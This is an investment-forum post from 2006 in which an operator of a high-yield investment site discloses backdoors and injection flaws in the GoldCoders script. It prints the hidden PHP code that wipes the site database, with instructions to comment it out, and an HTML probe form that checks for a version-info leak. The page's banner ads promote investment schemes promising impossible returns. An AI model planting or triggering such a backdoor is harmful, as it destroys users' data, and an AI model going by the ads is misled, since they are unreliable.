CashTanker
Happy Investing, With Happy Christian Community
 
our advertising disclaimer | Disclaimer - Must be read before using forum or clicking any links
imoneyreserve.com
Your Ad here!
*Offshore Banking, Corporations, Anonymous Liberty Reserve debit cards issued instantly*
*Scans only Belize IBC with Cyprus Corporate Bank Account* www.offshoreprivacy.org
BlockDOS.net - DDOS Protected Web Hosting!
The same protection that Talkgold Uses! Starting at $400/month when you mention Talkgold! The most reliable DDOS protection online!
Put your banner or text ad in the rotation above!ONLY $17/day, $99/week, or $379/month!


Your Ad Here
Your Ad Here

above banners and links are advertisements only. We do not endorse or vouch for any advertisers.Put Your 728X90 Banner Here NOW!

Go Back   Talkgold HYIP, Investment & Money Forum > Caution : Risky High Yield Investing Programs > HYIP - AutoSurf Program Admin Talk
Reload this Page

HYIP Admins - MUST READ

User Name
Password
 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1  
Old 02-01-2006, 01:59 PM
tinytiny's Avatar
tinytiny tinytiny is offline
VIP Investor
Join Date: Feb 2006
Posts: 1,162
Default HYIP Admins - MUST READ
First of all a great **** to Goldcoders.
i was running a hyip site, everything was going smooth and suddenly everything zeroed
and then we saw how everyone was shouting here .. how many sites gone .. really dont know ..
so i decided to check that hyip script myself for the bugs/erros

and see what in less than one hour i found more than 20 bugs in their bull**** crap. the ******* GoldCoders themselves put the backdoor in it so that they can turn the game at any point what a lame act . and no not 1 not 2 a long list . the wholel script is full of this bull****
just to name a few

1. reset to zero backdoor
2. sql injections
3. aaa/ddd user probs
4. empty user probs
5. cookie injections
6. cookie injection , reset admin pass
7. cookie injection , get admin access
8. improper input checking on turing images . etc.
9. send info to GC servers (what a lame act)


and it continues ...

one of their most beautiful for which everyone please give em a clap was the reset db backdoor ..

well the decoded script which is being used by many hyips is easy to patch at least remove the following lines to ensure that nobody will be able to crash the db
open the file index.php , search for the following code and then just comment out it be putting /* */ around it
like this

Code:
/*
if (($frm['a'] == 'register' AND $frm_env['REQUEST_METHOD'] == 'POST'))
  {
    $string = $settings['license'] . $frm_env['HTTP_HOST'] . date ('d') . date ('Y') . date ('m');
    if ($frm['string'] == md5 ($string))
    {
      $q = 'update hm2_users set came_from = \'      \' where id = 1';
      mysql_query ($q);
      print '-';
      if ($frm['string2'] == date ('d'))
      {
        $q = 'delete from hm2_history where type=\'withdrawal\'';
        mysql_query ($q);
      }

      if ($frm['string2'] == date ('y'))
      {
        $q = 'delete from hm2_deposits';
        mysql_query ($q);
        $q = 'delete from hm2_emails';
        mysql_query ($q);
        $q = 'delete from hm2_history';
        mysql_query ($q);
        $q = 'delete from hm2_online';
        mysql_query ($q);
        $q = 'delete from hm2_plans';
        mysql_query ($q);
      }

      db_close ($dbconn);
      exit ();
    }
  }
*/
the ones which are using the zend encoded script .. hmm dont think this backdor is not present in it, IT IS
instead if anyone wants to quickly check whether their site is running a backdoor'ed script or not
open the notepad and type the following lines , replace your site with your own


Code:
<form method=post action=http://yoursite.com/index.php>
<input type=hidden name=a value=ver><br>
<input type=submit>
</form>
save the file as HTML open it in the browser and click the submit . if you get some info including the LICENSE , DATE and HOST NAME , then your script is vulnerable


the PHP code which generates this info is just located above the one which i posted above smile.gif you may remove that as well

if you are using a proper licence from GC , ask those ***** to patch it before anyone else do it for you smile.gif

the un-licensed copies may have other backdoors inserted by different people , their distributers including sending an email containing your admin password account numbers etc.. and blah blah

use them at yoru own risk , never trust anyone

if you want to see at how many places their script sends back the notifications to their server search for check.cgi in the PHP files . a simple one is in config.inc.php

To GC programmers : what a great professionalism you have shown by inserting these little naughty pieces of code everywhere

create a new version now . encode it with something else . come on baby

To the admins who are running hyips from shared hostings . try to avoid it unless you are sure that nobody else can access your globally writeable settings.php file

Again to GC : lamers cannot you insert these settings in the DB as well instead of just 777 em and putting in the root directory so that others can enjoy , fair play

its enough now guys , i have some very nice exploits of it including the 0-day of cookie injection/get admin access prob , lemme play with it for a while .

Last: i am not that much lame to delete your dbs, if you want to remove these bugs and dont know the abc ask someone else . i will not say that i am selling some SECURED script ,beware of these

and once again a great **** to GoldCoders , i suggest nobody will ever pay them a penny
Reply With Quote
-- Sponsored Links --
 

« Previous Thread | Next Thread »

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes
Threaded Mode Threaded Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


TALKGOLD
SIDEBAR ADS
ADVERTISE HERE. Must read: Advertising Terms & Disclaimer
PUT YOUR 120X120 AD HERE FOR ONLY $560/WEEK!
Click Here for details.
Your ad here! Cost of Ad - $550
Your ad here! Cost of Ad - $540
Your ad here! Cost of Ad - $530
Your ad here! Cost of Ad - $520
Your ad here! Cost of Ad - $510
Your ad here! Cost of Ad - $310
Your ad here! Cost of Ad - $230
Cost of Ad - $200
Your ad here! Cost of Ad - $190
Your Ad Here Cost of Ad - $120
Your Ad Here Cost of Ad - $120
Your Ad Here Cost of Ad - $110
Your Ad Here Cost of Ad - $105
Your ad here Cost of Ad - $105
Your ad here Cost of Ad - $105
Your ad here Cost of Ad - $105
Cost of Ad - $100
Your Ad Here Cost of Ad - $100
Instaforex Cost of Ad - $95
Your ad here! Cost of Ad - $80
Cost of Ad - $75
Your ad here Cost of Ad - $75
Your ad here Cost of Ad - $75
YOUR AD HERE

PUT YOUR NON-ROTATING AD HERE NOW!
ONLY $75/Week


click here
click here
YOUR AD HERE!
YOUR AD HERE!
Well Profit

1500% - 2000% After 1 Day, 3200% - 4200% After 2 Days

Only $39/week or $135/month - Advertise Now!
GENIUS PROFIT

 250% After 10 Minutes (Instant Withdrawal)
800% After 3 Hour (Instant Withdrawal)
1400% After 10 Hour (Instant Withdrawal)
2500% After 24 Hour (Instant Withdrawal)
Www.Genius-Profit.Com
Only $39/week or $135/month - Advertise Now!
Check our Advertising Rates!

All times are GMT. The time now is 11:44 PM.

Add to Google
Contact Us - TG Main Page - WL - BLOG - THF - EBook Reviews - Disclaimer

Protected by BlockDOS.net - DDOS Protection
Powered by: vBulletin - Copyright ©2000 - 2005, Jelsoft Enterprises Ltd.